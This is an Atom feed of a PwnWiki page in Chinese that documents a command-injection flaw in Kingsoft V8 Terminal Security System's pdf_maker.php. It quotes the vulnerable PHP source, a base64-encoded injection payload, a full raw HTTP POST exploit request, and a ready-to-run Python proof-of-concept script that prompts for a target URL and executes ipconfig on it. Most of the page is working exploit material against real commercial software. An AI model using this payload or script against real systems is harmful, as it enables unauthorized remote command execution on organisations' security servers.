<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E9%87%91%E5%B1%B1_V8_%E7%B5%82%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%B5%B1_pdf_maker.php_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>金山 V8 終端安全系統 pdf maker.php 命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=%E9%87%91%E5%B1%B1_V8_%E7%B5%82%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%B5%B1_pdf_maker.php_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E9%87%91%E5%B1%B1_V8_%E7%B5%82%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%B5%B1_pdf_maker.php_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-07T20:21:28Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E9%87%91%E5%B1%B1_V8_%E7%B5%82%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%B5%B1_pdf_maker.php_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1850&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==漏洞影響== 金山 V8 终端安全系统  ==漏洞復現== V8安裝包： &lt;pre&gt; http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso &lt;/pre&gt; 存在漏洞的文件...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E9%87%91%E5%B1%B1_V8_%E7%B5%82%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%B5%B1_pdf_maker.php_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=1850&amp;oldid=prev"/>
		<updated>2021-04-22T01:52:57Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==漏洞影響== 金山 V8 终端安全系统  ==漏洞復現== V8安裝包： &amp;lt;pre&amp;gt; http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso &amp;lt;/pre&amp;gt; 存在漏洞的文件...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==漏洞影響==&lt;br /&gt;
金山 V8 终端安全系统&lt;br /&gt;
&lt;br /&gt;
==漏洞復現==&lt;br /&gt;
V8安裝包：&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://duba-011.duba.net/netversion/Package/KAVNETV8Plus.iso&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
存在漏洞的文件為&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Kingsoft\Security Manager\SystemCenter\Console\inter\pdf_maker.php&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
require_once (dirname(__FILE__).&amp;quot;\\common\\HTTPrequest_SCpost.php&amp;quot;);&lt;br /&gt;
/*&lt;br /&gt;
{&lt;br /&gt;
   &amp;quot;kptl&amp;quot; :&lt;br /&gt;
{&lt;br /&gt;
&amp;quot;set_exportpdf_cmd&amp;quot; :&lt;br /&gt;
    {&lt;br /&gt;
    &amp;quot;url&amp;quot; : &amp;quot;http://172.18.254.146/report/system/main.php?userSession=5784727B-7AEA-4EFE-B0CB-DDD6DA1CABD3&amp;amp;guid=1AC380D9-                580C-49A8-B6EC-787CF50FA928&amp;amp;VHierarchyID=ADMIN&amp;quot;,&lt;br /&gt;
    &amp;quot;fileName&amp;quot;:&amp;quot;test.pdf&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
}&lt;br /&gt;
*/&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  //$post = file_get_contents(&amp;quot;php://input&amp;quot;);&lt;br /&gt;
  &lt;br /&gt;
  /*&lt;br /&gt;
  $post = array(&amp;quot;kptl&amp;quot;=&amp;gt;&lt;br /&gt;
      array(&amp;quot;set_exportpdf_cmd&amp;quot;=&amp;gt;array(&lt;br /&gt;
        &amp;quot;url&amp;quot;=&amp;gt;&amp;quot;http://172.18.254.146/report/system/main.php?userSession=5784727B-7AEA-4EFE-B0CB-DDD6DA1CABD3&amp;amp;guid=1AC380D9-580C-49A8-B6EC-787CF50FA928&amp;amp;VHierarchyID=ADMIN&amp;quot;,&lt;br /&gt;
        &amp;quot;fileName&amp;quot;=&amp;gt;&amp;quot;test1234.pdf&amp;quot;&lt;br /&gt;
        )&lt;br /&gt;
      ));&lt;br /&gt;
      */&lt;br /&gt;
      &lt;br /&gt;
  &lt;br /&gt;
      &lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
  $url = $_POST[&amp;quot;url&amp;quot;];&lt;br /&gt;
  $fileName =  $_POST[&amp;quot;fileName&amp;quot;];&lt;br /&gt;
  $batName=$fileName;&lt;br /&gt;
  if ($url == null || $fileName == null)&lt;br /&gt;
  {&lt;br /&gt;
    $return[&amp;quot;nResult&amp;quot;] = __LINE__;&lt;br /&gt;
    echo json_encode($return,JSON_UNESCAPED_UNICODE);&lt;br /&gt;
    return ;&lt;br /&gt;
  }&lt;br /&gt;
  &lt;br /&gt;
  $url = base64_decode($url);&lt;br /&gt;
  $nameStr = base64_decode($fileName).date(&amp;quot;Y-m-d&amp;quot;).&amp;quot;.pdf&amp;quot;;&lt;br /&gt;
  $fileName=&amp;quot;..\\htmltopdf\\&amp;quot;.$nameStr;&lt;br /&gt;
&lt;br /&gt;
  system('mkdir ..\\htmltopdf');&lt;br /&gt;
&lt;br /&gt;
  &lt;br /&gt;
  $cmd = '..\\..\\wkhtmltopdf.exe &amp;quot;'.$url.'&amp;quot; '.$fileName;&lt;br /&gt;
  if (getApacheVersion()&amp;gt;=24) { //apache 2.4 php 7 版本 只能在  bat中运行&lt;br /&gt;
    $cmd =&amp;quot; del &amp;quot;.$fileName;&lt;br /&gt;
&lt;br /&gt;
    exec($cmd);&lt;br /&gt;
    $url_= str_replace('%','%%', $url);&lt;br /&gt;
    $cmd = '..\\..\\wkhtmltopdf.exe &amp;quot;'.$url_.'&amp;quot; '.$fileName;&lt;br /&gt;
    $batName =&amp;quot;exec_wkhtmltopdf.bat&amp;quot;;&lt;br /&gt;
    $myfile = fopen($batName , &amp;quot;w&amp;quot;);&lt;br /&gt;
    //$cmd =iconv(&amp;quot;UTF-8&amp;quot;, &amp;quot;gbk&amp;quot;, $cmd );&lt;br /&gt;
    fwrite($myfile, $cmd);&lt;br /&gt;
    fclose($myfile);&lt;br /&gt;
    $cmd =$batName ;&lt;br /&gt;
    exec($cmd);&lt;br /&gt;
    $cmd =&amp;quot; del &amp;quot;.$batName;&lt;br /&gt;
    exec($cmd);&lt;br /&gt;
    }else&lt;br /&gt;
    {&lt;br /&gt;
  system($cmd);&lt;br /&gt;
    }&lt;br /&gt;
  // echo $url;&lt;br /&gt;
  $return = array(&amp;quot;nResult&amp;quot; =&amp;gt; &amp;quot;0&amp;quot;,&amp;quot;fileName&amp;quot; =&amp;gt;$nameStr,&amp;quot;url&amp;quot;=&amp;gt;$url);&lt;br /&gt;
  echo json_encode($return,JSON_UNESCAPED_UNICODE);&lt;br /&gt;
  &lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
這裏传入base64加密的拼接命令即可执行任意命令&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;|| ipconfig || --base64--&amp;gt; url=IiB8fCBpcGNvbmZpZyB8fA==&amp;amp;fileName=xxx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
POST /inter/pdf_maker.php HTTP/1.1&lt;br /&gt;
Host: xxx.xxx.xxx.xxx&lt;br /&gt;
Content-Length: 45&lt;br /&gt;
Pragma: no-cache&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Referer:&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6&lt;br /&gt;
Cookie: PHPSESSID=noei1ghcv9rqgp58jf79991n04&lt;br /&gt;
&lt;br /&gt;
url=IiB8fCBpcGNvbmZpZyB8fA%3D%3D&amp;amp;fileName=xxx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import requests&lt;br /&gt;
import sys&lt;br /&gt;
import random&lt;br /&gt;
import re&lt;br /&gt;
from requests.packages.urllib3.exceptions import InsecureRequestWarning&lt;br /&gt;
&lt;br /&gt;
def title():&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
    print('+  \033[34mPOC_Des: http://wiki.peiqi.tech                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mGithub : https://github.com/PeiQi0                                 \033[0m')&lt;br /&gt;
    print('+  \033[34m公众号  : PeiQi文库                                                   \033[0m')&lt;br /&gt;
    print('+  \033[34mTitle  : 金山 V8 终端安全系统 pdf_maker.php 命令执行漏洞                 \033[0m')&lt;br /&gt;
    print('+  \033[36m使用格式:  python3 poc.py                                            \033[0m')&lt;br /&gt;
    print('+  \033[36mUrl         &amp;gt;&amp;gt;&amp;gt; http://xxx.xxx.xxx.xxx                             \033[0m')&lt;br /&gt;
    print('+------------------------------------------')&lt;br /&gt;
&lt;br /&gt;
def POC_1(target_url):&lt;br /&gt;
    vuln_url = target_url + &amp;quot;/inter/pdf_maker.php&amp;quot;&lt;br /&gt;
    headers = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36&amp;quot;,&lt;br /&gt;
        &amp;quot;Content-Type&amp;quot;: &amp;quot;application/x-www-form-urlencoded&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    data = &amp;quot;url=IiB8fCBpcGNvbmZpZyB8fA==&amp;amp;fileName=xxx&amp;quot;&lt;br /&gt;
    try:&lt;br /&gt;
        response = requests.post(url=vuln_url, headers=headers, data=data, verify=False, timeout=5)&lt;br /&gt;
        if &amp;quot;Windows&amp;quot; in response.text and response.status_code == 200:&lt;br /&gt;
            print(&amp;quot;\033[32m[o] 目标 {} 存在漏洞 ,执行 ipconfig, 响应为:\n{} \033[0m&amp;quot;.format(target_url, response.text))&lt;br /&gt;
        else:&lt;br /&gt;
            print(&amp;quot;\033[31m[x] 不存在漏洞 \033[0m&amp;quot;)&lt;br /&gt;
            sys.exit(0)&lt;br /&gt;
    except Exception as e:&lt;br /&gt;
        print(&amp;quot;\033[31m[x] 请求失败 \033[0m&amp;quot;, e)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if __name__ == '__main__':&lt;br /&gt;
    title()&lt;br /&gt;
    target_url = str(input(&amp;quot;\033[35mPlease input Attack Url\nUrl &amp;gt;&amp;gt;&amp;gt; \033[0m&amp;quot;))&lt;br /&gt;
    POC_1(target_url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==參考==&lt;br /&gt;
https://mp.weixin.qq.com/s/zaNvtagdCTx9XtGeotWoYw&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>